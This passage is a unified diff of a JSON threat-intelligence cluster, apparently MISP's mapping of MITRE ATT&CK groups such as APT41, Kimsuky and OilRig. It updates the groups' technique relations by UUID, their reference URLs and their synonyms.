- "dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "438c967d-3996-4870-bfc2-3954752a1927",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "47124daf-44be-4530-9c63-038bc64318dd",
"tags": [
@@ -15583,20 +15434,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "4efc3e00-72f2-466a-ab7c-8a7dc6603b19",
"tags": [
@@ -15604,27 +15441,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "54a01db0-9fab-4d5f-8209-53cef8425f4a",
"tags": [
@@ -15647,7 +15463,7 @@
"type": "uses"
},
{
- "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15688,20 +15504,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830",
"tags": [
@@ -15744,27 +15546,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926",
"tags": [
@@ -15772,27 +15553,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
"tags": [
@@ -15829,7 +15589,7 @@
"type": "uses"
},
{
- "dest-uuid": "861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a",
+ "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15842,20 +15602,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe",
"tags": [
@@ -15863,13 +15609,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
"tags": [
@@ -16017,13 +15756,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -16052,20 +15784,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "bc76d0a4-db11-4551-9ac4-01a469cfb161",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bdad6f3b-de88-42fa-9295-d29b5271808e",
"tags": [
@@ -16073,13 +15791,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"tags": [
@@ -16094,13 +15805,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c26f1c05-b861-4970-94dc-2f7f921a3074",
"tags": [
@@ -16108,20 +15812,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c3c8c916-2f3c-4e71-94b2-240bdfc996f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ca9d3402-ada3-484d-876a-d717bd6e05f2",
"tags": [
@@ -16143,27 +15833,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d4dc46e3-5ba5-45b9-8204-010867cacfcb",
"tags": [
@@ -16185,6 +15854,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -16192,20 +15868,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e33e4603-afab-402d-b2a1-248d435b5fe0",
"tags": [
@@ -16213,13 +15875,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -16241,13 +15896,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68",
"tags": [
@@ -16255,13 +15903,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "eec23884-3fa1-4d8a-ac50-6f104d51e235",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -16269,13 +15910,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
"tags": [
@@ -16283,20 +15917,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f59508a6-3615-47c3-b493-6676e1a39a87",
"tags": [
@@ -16311,27 +15931,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
"tags": [
@@ -17289,6 +16888,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -17386,9 +16992,9 @@
"external_id": "G0096",
"refs": [
"https://attack.mitre.org/groups/G0096",
- "https://blog.group-ib.com/colunmtk_apt41",
- "https://content.fireeye.com/apt-41/rpt-apt41",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.group-ib.com/blog/colunmtk-apt41/",
+ "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf"
],
"synonyms": [
"APT41",
@@ -17557,6 +17163,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
"tags": [
@@ -17662,6 +17275,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "6c575670-d14c-4c7f-9b9d-fd1b363e255d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
"tags": [
@@ -17767,6 +17387,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
"tags": [
@@ -18120,13 +17747,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4",
"tags": [
@@ -18141,6 +17761,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d906e6f7-434c-44c0-b51a-ed50af8f7945",
"tags": [
@@ -18219,6 +17846,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "24ce266c-1860-5e04-a107-48d1d39f8ebf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42",
"tags": [
@@ -18253,13 +17887,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "24ce266c-1860-5e04-a107-48d1d39f8ebf",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "277d2f87-2ae5-4730-a3aa-50c1fdff9656",
@@ -18457,15 +18084,7 @@
"Taidoor"
]
},
- "related": [
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- }
- ],
+ "related": [],
"uuid": "59140a2e-d117-4206-9b2c-2a8662bd9d46",
"value": "Taidoor - G0015"
},
@@ -18475,8 +18094,8 @@
"external_id": "G0061",
"refs": [
"https://attack.mitre.org/groups/G0061",
- "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html",
- "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"
+ "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
+ "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html"
],
"synonyms": [
"FIN8"
@@ -18658,13 +18277,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -18693,6 +18305,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -19771,14 +19390,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -20127,13 +19746,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c9703cd3-141c-43a0-a926-380082be5d04",
"tags": [
@@ -20567,6 +20179,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e6f4af06-fbb5-5471-82ae-b0bdb4d446ce",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "e928333f-f3df-4039-9b8b-556c2add0e42",
"tags": [
@@ -20587,13 +20206,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "e6f4af06-fbb5-5471-82ae-b0bdb4d446ce",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "00f67a77-86a4-4adf-be26-1a54fc713340",
@@ -21108,13 +20720,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4",
"tags": [
@@ -21257,13 +20862,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -22145,6 +21743,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "96c3508e-f5f9-52b4-9d1e-b246d68f643d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -22243,26 +21848,12 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "96c3508e-f5f9-52b4-9d1e-b246d68f643d",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "4a2ce82e-1a74-468a-a6fb-bbead541383c",
@@ -22526,13 +22117,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -22575,6 +22159,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -23691,7 +23282,7 @@
"refs": [
"https://attack.mitre.org/groups/G0085",
"https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html",
- "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html",
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf",
"https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html"
],
"synonyms": [
@@ -23793,10 +23384,10 @@
"external_id": "G0045",
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
+ "http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
"https://attack.mitre.org/groups/G0045",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
"https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf",
- "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
"https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html",
"https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf",
@@ -24743,13 +24334,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
"tags": [
@@ -24792,6 +24376,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -25002,7 +24593,7 @@
"https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf",
"https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/",
"https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/",
- "https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf",
+ "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf",
"https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/",
"https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/",
"https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
@@ -25716,7 +25307,7 @@
"value": "Kimsuky - G0094"
},
{
- "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)",
+ "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)",
"meta": {
"external_id": "G0049",
"refs": [
@@ -25726,6 +25317,7 @@
"http://www.clearskysec.com/oilrig/",
"https://attack.mitre.org/groups/G0049",
"https://pan-unit42.github.io/playbook_viewer/",
+ "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens",
"https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/",
"https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/",
@@ -25737,7 +25329,8 @@
"COBALT GYPSY",
"IRN2",
"APT34",
- "Helix Kitten"
+ "Helix Kitten",
+ "Evasive Serpens"
]
},
"related": [
@@ -26280,13 +25873,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -27105,18 +26691,18 @@
"type": "uses"
},
{
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "dest-uuid": "d0b9840d-efe2-5200-89d1-2f1a37737e30",
"tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
+ "estimative-language:likelihood-probability=\"likely\""
],
- "type": "uses"
+ "type": "similar"
},
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
@@ -27145,13 +26731,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "d0b9840d-efe2-5200-89d1-2f1a37737e30",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "38863958-a201-4ce1-9dbe-539b0b6804e0",
@@ -27502,13 +27081,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "f9c06633-dcff-48a1-8588-759e7cec5694",
@@ -27920,13 +27492,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b",
"tags": [
@@ -28004,6 +27569,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -28184,13 +27756,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -28205,6 +27770,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -28505,453 +28077,12 @@
]
},
"related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
- "tags": [
